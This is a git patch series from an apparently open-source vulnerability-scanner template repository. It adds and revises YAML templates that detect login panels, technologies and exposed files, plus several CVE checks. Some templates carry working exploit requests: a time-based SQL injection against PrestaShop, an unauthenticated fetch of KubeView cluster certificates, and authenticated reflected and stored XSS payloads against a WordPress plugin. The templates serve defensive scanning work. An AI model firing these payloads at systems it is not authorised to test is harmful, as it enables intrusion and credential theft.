index e0d1d652e1..f9112c83cf 100644 --- a/exposed-panels/persis-panel.yaml +++ b/exposed-panels/persis-panel.yaml @@ -15,7 +15,11 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/main" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word @@ -23,6 +27,9 @@ requests: words: - "Persis" - "/persis/" + - "persis.require" + - "persis.ui.progress" + - "images_persis/" condition: or - type: status From cb87cbc097d38c0e7bce2181b239a442f23908b0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 14:25:08 +0530 Subject: [PATCH 0754/1415] Update CVE-2020-26248.yaml --- cves/2020/CVE-2020-26248.yaml | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/cves/2020/CVE-2020-26248.yaml b/cves/2020/CVE-2020-26248.yaml index acf37420a5..9c5433731d 100644 --- a/cves/2020/CVE-2020-26248.yaml +++ b/cves/2020/CVE-2020-26248.yaml @@ -11,19 +11,22 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 classification: cve-id: CVE-2020-26248 - tags: cve,prestashop,productcomments,cve2020,sqli + metadata: + verified: true + tags: cve,cve2020,sqli,prestshop requests: - - method: GET - path: - - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(5)))a)" + - raw: + - | + @timeout: 20s + GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1 + Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' - - - type: status - status: - - 200 \ No newline at end of file + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains(body, "average_grade")' + condition: and From dd44fbb4e6e66849401c3ea71c4d32029aed10c0 Mon Sep 17 00:00:00 2001 From: For3stCo1d <57119052+For3stCo1d@users.noreply.github.com> Date: Tue, 29 Nov 2022 16:58:39 +0800 Subject: [PATCH 0755/1415] Create CVE-2022-45933.yaml --- cves/2022/CVE-2022-45933.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2022/CVE-2022-45933.yaml diff --git a/cves/2022/CVE-2022-45933.yaml b/cves/2022/CVE-2022-45933.yaml new file mode 100644 index 0000000000..033846a374 --- /dev/null +++ b/cves/2022/CVE-2022-45933.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-45933 + +info: + name: KubeView - Information disclosure + author: For3stCo1d + severity: high + description: | + KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure." + reference: + - https://github.com/benc-uk/kubeview/issues/95 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 + metadata: + shodan-query: http.title:"KubeView" + tags: cve,cve2022,kubeview,kubernetes,exposure + +requests: + - raw: + - | + GET /api/scrape/kube-system HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '-----BEGIN CERTIFICATE-----' + - '-----END CERTIFICATE-----' + - 'kubernetes.io' + condition: and + + - type: status + status: + - 200 From e1da5ecd8e9b6f4ce0cf15839ec8b2c553f05103 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 14:36:05 +0530 Subject: [PATCH 0756/1415] Update CVE-2022-45933.yaml --- cves/2022/CVE-2022-45933.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-45933.yaml b/cves/2022/CVE-2022-45933.yaml index 033846a374..99a2681225 100644 --- a/cves/2022/CVE-2022-45933.yaml +++ b/cves/2022/CVE-2022-45933.yaml @@ -10,14 +10,14 @@ info: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 metadata: + verified: true shodan-query: http.title:"KubeView" tags: cve,cve2022,kubeview,kubernetes,exposure requests: - - raw: - - | - GET /api/scrape/kube-system HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/scrape/kube-system" matchers-condition: and matchers: From 449b8ba35921a7b9252a69558403d272f3ec92ca Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 14:40:50 +0530 Subject: [PATCH 0757/1415] Update CVE-2022-45933.yaml --- cves/2022/CVE-2022-45933.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-45933.yaml b/cves/2022/CVE-2022-45933.yaml index 99a2681225..a53ada93b9 100644 --- a/cves/2022/CVE-2022-45933.yaml +++ b/cves/2022/CVE-2022-45933.yaml @@ -24,8 +24,8 @@ requests: - type: word part: body words: - - '-----BEGIN CERTIFICATE-----' - - '-----END CERTIFICATE-----' + - 'BEGIN CERTIFICATE' + - 'END CERTIFICATE' - 'kubernetes.io' condition: and From 14558333a74eb99ff3dfa08f56fa5a5fcb026dbf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 14:53:02 +0530 Subject: [PATCH 0758/1415] Update locklizard-webviewer-panel.yaml --- exposed-panels/locklizard-webviewer-panel.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/exposed-panels/locklizard-webviewer-panel.yaml b/exposed-panels/locklizard-webviewer-panel.yaml index b8ce840b24..632c6dc457 100644 --- a/exposed-panels/locklizard-webviewer-panel.yaml +++ b/exposed-panels/locklizard-webviewer-panel.yaml @@ -14,16 +14,18 @@ info: requests: - method: GET path: - - "{{BaseURL}}/webviewer/index.php" + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - 'content="Locklizard Web Viewer"' - - 'content="LockLizard"' - - "Locklizard Web Viewer" + - 'Locklizard Web Viewer' + - 'Did you remember your password?' condition: and - type: status From 60975d8fffad9a7a2351ff60b452ae386a30de14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Nov 2022 09:29:29 +0000 Subject: [PATCH 0759/1415] Auto Generated New Template Addition List [Tue Nov 29 09:29:28 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a717b3f805..9c19d93720 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml +exposed-panels/locklizard-webviewer-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml From f65f27f6c3c9046a0647798dac7d3cbd35a318aa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 15:19:04 +0530 Subject: [PATCH 0760/1415] Create dbeaver-database-connections.yaml --- .../files/dbeaver-database-connections.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/files/dbeaver-database-connections.yaml diff --git a/exposures/files/dbeaver-database-connections.yaml b/exposures/files/dbeaver-database-connections.yaml new file mode 100644 index 0000000000..604d5843bd --- /dev/null +++ b/exposures/files/dbeaver-database-connections.yaml @@ -0,0 +1,29 @@ +id: dbeaver-database-connections + +info: + name: DBeaver Database Connections + author: geeknik + severity: info + reference: + - https://dbeaver.com/docs/wiki/Admin-Manage-Connections/ + metadata: + verified: true + tags: dbeaver,files,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.dbeaver/data-sources.json" + + matchers-condition: and + matchers: + - type: word + words: + - '"folders": {' + - '"connection-types": {' + - '"connections": {' + condition: and + + - type: status + status: + - 200 From eb5fd26c1f0479367482468a062c966488549c90 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 15:29:32 +0530 Subject: [PATCH 0761/1415] Update cudatel-panel.yaml --- exposed-panels/cudatel-panel.yaml | 22 ++++++++++------------ 1 file changed, 10 insertions(+), 12 deletions(-) diff --git a/exposed-panels/cudatel-panel.yaml b/exposed-panels/cudatel-panel.yaml index 4da54349cb..ebc753eefb 100644 --- a/exposed-panels/cudatel-panel.yaml +++ b/exposed-panels/cudatel-panel.yaml @@ -1,29 +1,27 @@ id: cudatel-panel info: - name: CudaTel - Login Panel Detect + name: CudaTel Login Panel author: arafatansari severity: info metadata: - shodan-query: title:CudaTel 200 verified: true - tags: cudatel,panel + shodan-query: title:"CudaTel" + tags: panel,cudatel requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: + - type: word + words: + - 'CudaTel Communications Server' + - 'alt="CudaTel' + condition: or + - type: status status: - 200 - - - type: word - words: - - 'CudaTel Communications Server' - - 'Service Login' - - 'Username' - - 'Password' - condition: or From a8e506f22fb3351d3b7455d31d1de9a2c0c598ba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 15:39:58 +0530 Subject: [PATCH 0762/1415] Create workerman-websocket-detect.yaml --- technologies/workerman-websocket-detect.yaml | 43 ++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 technologies/workerman-websocket-detect.yaml diff --git a/technologies/workerman-websocket-detect.yaml b/technologies/workerman-websocket-detect.yaml new file mode 100644 index 0000000000..f858b8b9c1 --- /dev/null +++ b/technologies/workerman-websocket-detect.yaml @@ -0,0 +1,43 @@ +id: workerman-websocket-detect + +info: + name: Workerman Websocket Detection + author: geeknik + severity: info + reference: + - https://www.workerman.net/en/ + - https://github.com/walkor/Workerman + metadata: + verified: true + shodan-query: html:"workerman" + tags: tech,workerman,websocket + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'workerman' + + - type: word + part: body + words: + - 'Websocket' + - 'workerman' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + name: version + regex: + - 'workerman\/\d\.\d\.\d' From 1c6103524d6e5e1ab2cda811117d7463da156a5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 15:43:05 +0530 Subject: [PATCH 0763/1415] Update asus-router-login.yaml --- exposed-panels/asus-router-login.yaml | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/exposed-panels/asus-router-login.yaml b/exposed-panels/asus-router-login.yaml index bc213ffab8..62d122bfb2 100644 --- a/exposed-panels/asus-router-login.yaml +++ b/exposed-panels/asus-router-login.yaml @@ -1,13 +1,13 @@ id: asus-router-login info: - name: Asus Router - Login Panel + name: Asus Router Login Panel author: arafatansari severity: info metadata: - shodan-query: 'HTTP/1.0 200 OK Server: httpd/2.0 port:8080' verified: true - tags: asus,router,panel + shodan-query: 'Server: httpd/2.0 port:8080' + tags: panel,asus,router,iot requests: - method: GET @@ -16,14 +16,12 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'ASUS Login' - 'Sign in with your ASUS router account' - - 'Username' - - 'Password' condition: or + + - type: status + status: + - 200 From 4f27f1d9c8b2987a85dca516107e75875a4fe955 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 16:03:39 +0530 Subject: [PATCH 0764/1415] Update zyxel-router-login.yaml --- exposed-panels/zyxel-router-login.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/exposed-panels/zyxel-router-login.yaml b/exposed-panels/zyxel-router-login.yaml index 0675b121c9..fa5a08ffa9 100644 --- a/exposed-panels/zyxel-router-login.yaml +++ b/exposed-panels/zyxel-router-login.yaml @@ -5,24 +5,25 @@ info: author: arafatansari severity: info metadata: - shodan-query: 'title:"Web-Based Configurator"' verified: true - tags: zyxel,router,panel + shodan-query: 'title:"Web-Based Configurator" html:"zyxel"' + tags: panel,zyxel,router,iot requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/login" - - "{{BaseURL}}/" + stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'Welcome to the Web-Based Configurator' - 'zyxel' condition: and + + - type: status + status: + - 200 From 46dcb9ee92fb3d94999f239b342171e0635e2b12 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 19:09:35 +0530 Subject: [PATCH 0765/1415] Update wp-related-post-xss --- vulnerabilities/wordpress/wp-related-post-xss | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/wordpress/wp-related-post-xss b/vulnerabilities/wordpress/wp-related-post-xss index e4be204213..3cacb9b6ee 100644 --- a/vulnerabilities/wordpress/wp-related-post-xss +++ b/vulnerabilities/wordpress/wp-related-post-xss @@ -1,14 +1,17 @@ id: wp-related-post-xss info: - name: WordPress Related Posts <= 2.1.1 - Cross-Site Scripting + name: WordPress Related Posts <= 2.1.1 - Cross Site Scripting author: arafatansari severity: medium description: | WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent reference: - https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/ - tags: wordpress,xss,plugin,wpscan + - https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/ + metadata: + verified: true + tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated requests: - raw: @@ -17,26 +20,26 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - log=admin&pwd=admin123&wp-submit=Log+In&redirect_to={{Host}}%2Fwp-admin%2F&testcookie=1 + log={{username}}&pwd={{password}}&wp-submit=Log+In - | - GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1 + GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true - redirects: true - max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - '' + - '&action=edit' + - 'All Posts' + condition: and - type: word part: header words: - - "text/html" + - text/html - type: status status: From fd50f1c0709b916618733c40387341d2dc1397d5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 20:21:51 +0530 Subject: [PATCH 0766/1415] Update CVE-2022-3506.yaml --- cves/2022/CVE-2022-3506.yaml | 39 +++++++++++++++++++++++------------- 1 file changed, 25 insertions(+), 14 deletions(-) diff --git a/cves/2022/CVE-2022-3506.yaml b/cves/2022/CVE-2022-3506.yaml index f7ee972534..e776267947 100644 --- a/cves/2022/CVE-2022-3506.yaml +++ b/cves/2022/CVE-2022-3506.yaml @@ -8,7 +8,9 @@ info: The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ - tags: wordpress,xss,plugin,wpscan + metadata: + verified: true + tags: cve,cve2022,wordpress,wp,wp-plugin,xss,relatedposts,authenticated requests: - raw: @@ -17,30 +19,39 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - log=admin&pwd=admin123&wp-submit=Log+In&redirect_to={{Host}}%2Fwp-admin%2F&testcookie=1 + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1 + Host: {{Hostname}} - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_af799bb8d843135ea8438550f9a8b4e6=admin%7C1669705235%7CIGJKEmOLs5jCz06lVDPuolfmVDQbZC0wXGuVBewRhuD%7C7d62cc61df0f73b280f28510a05879a270392b50a12068fd68c9e801853a0e10; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_af799bb8d843135ea8438550f9a8b4e6=admin%7C1669705235%7CIGJKEmOLs5jCz06lVDPuolfmVDQbZC0wXGuVBewRhuD%7Cb8be6e1450ea194a89ffd327ad1eabf1afbf5a57f9d9f462673f170bc05105f4; wp-settings-time-1=1669534288 - option_page=rp4wp&action=update&_wpnonce=c0d0936d93&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28%2FXSS%2F%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D + option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D - | GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1 Host: {{Hostname}} cookie-reuse: true - redirects: true - max-redirects: 2 - matchers-condition: and + req-condition: true matchers: - - type: word - part: body - words: - - 'autofocus onfocus=alert(/XSS/)>' + - type: dsl + dsl: + - "contains(all_headers_4, 'text/html')" + - "status_code_4 == 200" + - 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")' + - "contains(body_4, 'The amount of automatically')" + condition: and - - type: status - status: - - 200 + extractors: + - type: regex + name: nonce + part: body + group: 1 + regex: + - 'name="_wpnonce" value="([0-9a-z]+)" />' + internal: true From 8836a4d9b63796f51b78baa40ca2e9b8e12fc9ea Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 29 Nov 2022 09:52:46 -0500 Subject: [PATCH 0767/1415] Dashboard Content Enhancements (#6181) Dashboard Content Enhancements --- exposed-panels/apache-jmeter-dashboard.yaml | 9 ++++++++- exposed-panels/apache/public-tomcat-manager.yaml | 8 ++++++-- exposed-panels/dplus-dashboard.yaml | 9 ++++++++- exposed-panels/fastpanel-hosting-control-panel.yaml | 9 ++++++++- exposed-panels/lacie-panel.yaml | 9 ++++++++- exposed-panels/lancom-router-panel.yaml | 9 ++++++++- exposed-panels/landrayoa-panel.yaml | 11 +++++++++-- exposed-panels/lansweeper-login.yaml | 9 ++++++++- exposed-panels/lantronix-webmanager-panel.yaml | 9 ++++++++- exposed-panels/lenovo-thinkserver-panel.yaml | 9 ++++++++- exposed-panels/leostream-panel.yaml | 9 ++++++++- exposed-panels/librenms-login.yaml | 9 ++++++++- exposed-panels/liferay-portal.yaml | 9 ++++++++- exposed-panels/linkerd-panel.yaml | 10 ++++++++-- exposed-panels/linksys-wifi-login.yaml | 9 ++++++++- exposed-panels/livehelperchat-admin-panel.yaml | 9 ++++++++- exposed-panels/livezilla-login-panel.yaml | 9 ++++++++- exposed-panels/logitech-harmony-portal.yaml | 9 ++++++++- exposed-panels/looker-panel.yaml | 9 ++++++++- exposed-panels/lucee-login.yaml | 9 ++++++++- exposed-panels/maestro-login-panel.yaml | 9 ++++++++- exposed-panels/magento-admin-panel.yaml | 11 ++++++++--- exposed-panels/mailhog-panel.yaml | 10 ++++++++-- exposed-panels/mailwatch-login.yaml | 9 ++++++++- exposed-panels/mantisbt-panel.yaml | 9 ++++++++- exposed-panels/matomo-login-portal.yaml | 12 +++++++++--- exposed-panels/mcloud-panel.yaml | 9 ++++++++- exposed-panels/meshcentral-login.yaml | 9 ++++++++- exposed-panels/metabase-panel.yaml | 10 ++++++++-- exposed-panels/metersphere-login.yaml | 11 +++++++++-- exposed-panels/mfiles-web-detect.yaml | 9 ++++++++- exposed-panels/microfocus-filr-panel.yaml | 9 ++++++++- exposed-panels/microfocus-vibe-panel.yaml | 9 ++++++++- exposed-panels/microsoft-exchange-panel.yaml | 10 ++++++++-- exposed-panels/mikrotik-routeros.yaml | 9 ++++++++- exposed-panels/mini-start-page.yaml | 9 ++++++++- exposed-panels/minio-browser.yaml | 11 +++++++++-- 37 files changed, 298 insertions(+), 49 deletions(-) diff --git a/exposed-panels/apache-jmeter-dashboard.yaml b/exposed-panels/apache-jmeter-dashboard.yaml index 8aff125683..59da4097c4 100644 --- a/exposed-panels/apache-jmeter-dashboard.yaml +++ b/exposed-panels/apache-jmeter-dashboard.yaml @@ -1,9 +1,14 @@ id: apache-jmeter-dashboard info: - name: Apache JMeter Dashboard + name: Apache JMeter Dashboard Login Panel - Detect author: tess severity: low + description: Apache JMeter Dashboard login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Apache JMeter Dashboard" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index 0ef97a598a..fd0d90bd5c 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -1,11 +1,13 @@ id: public-tomcat-manager info: - name: Apache Tomcat Manager Disclosure + name: Apache Tomcat Manager Login Panel - Detect author: Ahmed Sherif,geeknik,sinKettu severity: info - description: An Apache Tomcat Manager panel was discovered. + description: Apache Tomcat Manager login panel was detected. classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 metadata: shodan-query: title:"Apache Tomcat" @@ -30,3 +32,5 @@ requests: - 401 - 200 condition: or + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/dplus-dashboard.yaml b/exposed-panels/dplus-dashboard.yaml index 646cc7cd88..34d4f532e2 100644 --- a/exposed-panels/dplus-dashboard.yaml +++ b/exposed-panels/dplus-dashboard.yaml @@ -1,9 +1,14 @@ id: dplus-dashboard info: - name: DPLUS Dashboard Exposure + name: DPLUS Dashboard Panel - Detect author: tess severity: info + description: DPLUS Dashboard panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"DPLUS Dashboard" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/fastpanel-hosting-control-panel.yaml b/exposed-panels/fastpanel-hosting-control-panel.yaml index 6f30946ac4..5d016caeca 100644 --- a/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -1,9 +1,14 @@ id: fastpanel-hosting-control-panel info: - name: Fastpanel Hosting Control Panel + name: FASTPANEL Login Panel - Detect author: pikpikcu severity: info + description: FASTPANEL login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"FASTPANEL HOSTING CONTROL" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/lacie-panel.yaml b/exposed-panels/lacie-panel.yaml index 24e65f2388..9f89c482eb 100644 --- a/exposed-panels/lacie-panel.yaml +++ b/exposed-panels/lacie-panel.yaml @@ -1,11 +1,16 @@ id: lacie-panel info: - name: LaCie Login Panel + name: LaCie Login Panel - Detect author: dhiyaneshDK severity: info + description: LaCie login panel was detected. reference: - https://www.exploit-db.com/ghdb/7118 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,lacie,login,edb requests: @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml index 28365a2baf..6f6eb3610c 100644 --- a/exposed-panels/lancom-router-panel.yaml +++ b/exposed-panels/lancom-router-panel.yaml @@ -1,9 +1,14 @@ id: lancom-router-panel info: - name: Lancom Router Panel + name: Lancom Router Login Panel - Detect author: __Fazal,daffainfo severity: info + description: Lancom router login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: html:"LANCOM Systems GmbH" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/landrayoa-panel.yaml b/exposed-panels/landrayoa-panel.yaml index 105a663d34..4084b11962 100644 --- a/exposed-panels/landrayoa-panel.yaml +++ b/exposed-panels/landrayoa-panel.yaml @@ -1,9 +1,14 @@ id: landrayoa-panel info: - name: LandrayOA Panel Login + name: Landray Login Panel - Detect author: YanYun severity: info + description: Landray login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,landrayoa requests: @@ -27,4 +32,6 @@ requests: - type: word words: - 'isopen=' - part: header \ No newline at end of file + part: header + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml index 07c55c4edd..630d667216 100644 --- a/exposed-panels/lansweeper-login.yaml +++ b/exposed-panels/lansweeper-login.yaml @@ -1,9 +1,14 @@ id: lansweeper-login info: - name: Lansweeper Login + name: Lansweeper Login Panel - Detect author: divya_mudgal severity: info + description: Lansweeper login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Lansweeper - Login" @@ -31,3 +36,5 @@ requests: group: 1 regex: - '"\/js\/CustomControls\.js\?([0-9.]+)" type="text\/javascript"' + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/lantronix-webmanager-panel.yaml b/exposed-panels/lantronix-webmanager-panel.yaml index f04c316ccd..c1651dee1d 100644 --- a/exposed-panels/lantronix-webmanager-panel.yaml +++ b/exposed-panels/lantronix-webmanager-panel.yaml @@ -1,9 +1,14 @@ id: lantronix-webmanager-panel info: - name: Lantronix WEB-Manager Panel + name: Lantronix Web Manager Login Panel- Detect author: princechaddha severity: info + description: Lantronix Web Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,lantronix requests: @@ -29,3 +34,5 @@ requests: group: 1 regex: - ">Version ([0-9.]+)" + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/lenovo-thinkserver-panel.yaml b/exposed-panels/lenovo-thinkserver-panel.yaml index 966fa89347..8d3eee5036 100644 --- a/exposed-panels/lenovo-thinkserver-panel.yaml +++ b/exposed-panels/lenovo-thinkserver-panel.yaml @@ -1,9 +1,14 @@ id: lenovo-thinkserver-panel info: - name: Lenovo ThinkServer System Manager Panel Detect + name: Lenovo ThinkServer System Manager Login Panel - Detect author: princechaddha severity: info + description: Lenovo ThinkServer System Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,thinkserver,lenovo requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git 